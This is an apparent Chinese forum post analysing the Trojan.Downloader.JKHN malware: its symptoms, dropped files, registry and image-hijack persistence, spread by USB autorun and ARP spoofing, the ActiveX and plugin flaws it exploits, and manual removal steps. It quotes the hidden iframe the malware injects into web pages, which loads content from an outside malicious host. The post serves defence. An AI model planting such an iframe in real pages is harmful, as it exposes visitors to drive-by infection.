打印

[交流] Trojan.Downloader.JKHN 病毒分析

0

Trojan.Downloader.JKHN 病毒分析

Trojan.Downloader.JKHN  病毒分析

类型: Trojan

受影响系统:Windows 98, Windows XP,  Windows Server 2003, Windows 2000

感染症状:
1、        盘符无法直接双击开,可用右键打开;
2、        部分页面无法正常打开,查看网页原文被插入如下代码
<iframe src=http://ww.xnibi.com/index.gif width=10 height=1></iframe>
3、        存在ARP 欺骗
病毒分析:

生成文件:1、用户感染后会在本地及移动设备所有盘符下生成,autorun.inf   MSDOS.exe
            2、在IE  目录  C:\Program Files\Internet Explorer  下生成,多个pif  病毒文件
           3、替换系统自动更新文件,c:\windows\system32\wuauclt1.exe
及c:\windows\system32\dllcache\wuauclt.exe
       创建启动项目:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Test   指向c:\windows\system32\wuauclt1.exe
      添加映像劫持,使用部分安全工具及杀毒软件无法正常使用,当用户打开被劫持软件时直接去执行病毒文件。
传播方式:
1、        移动设备
2、        通过Arp 欺骗劫持http 数据 嵌入三方软件漏洞利用代码、进行传播。
主要利用以下三软件漏洞传播:

        Flash Player 插件漏洞  (建议用户升级到)
        UUSee网络电视2008 插件漏洞(UUUpgrade.ocx 3.0.2.12)
        MS06-014漏洞
        联众世界游戏大厅主程序GLWorld所安装的ActiveX控件漏洞。
        realplayer 6.0.14 整数溢出漏洞
        Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
        新浪UC DLoader Class ActiveX控件漏洞
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        MS Office Snapshot Viewer ActiveX Exploit
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
解决办法:

手工清除办法(建议安全模式清除、清除时请不要双击)
1、        结束进程 NOTEPAD.EXE ,wuauclt1.exe
2、        以资源管理器的方式打开我的电脑,删除本地及移动设备根目录下,autorun.inf   MSDOS.exe
3、        删除ie 目录下所有后缀为pif的文件,删除c:\windows\ 伪记事本文件,NOTEPAD.EXE
4、        修复被替换的系统自动更新文件c:\windows\system32\wuauclt1.exe
及c:\windows\system32\dllcache\wuauclt.exe  
如在不能删除或替换,可使用 IceSword 等工具强制删除后再替换。(注:安全工具在使用前请改名)
5、        删除注册表启动项目及映像劫持

说明:
近期通过对病毒分析发现,目前利用三方软件漏洞传播的病毒十分活越,被利用的第三方ActiveX插件漏洞,涉及迅雷、暴风影音、百度超级搜霸、realplayer等多款常见软件的部分版本中,而且其中多数漏洞曾经是或者现在仍是0day漏洞。建议广大用户及时关注,常见三方软件软件漏洞更新、及时进行修复,避免感染病毒给你带来不便。

TOP

当前时区 GMT+8, 现在时间是 2025-3-21 00:15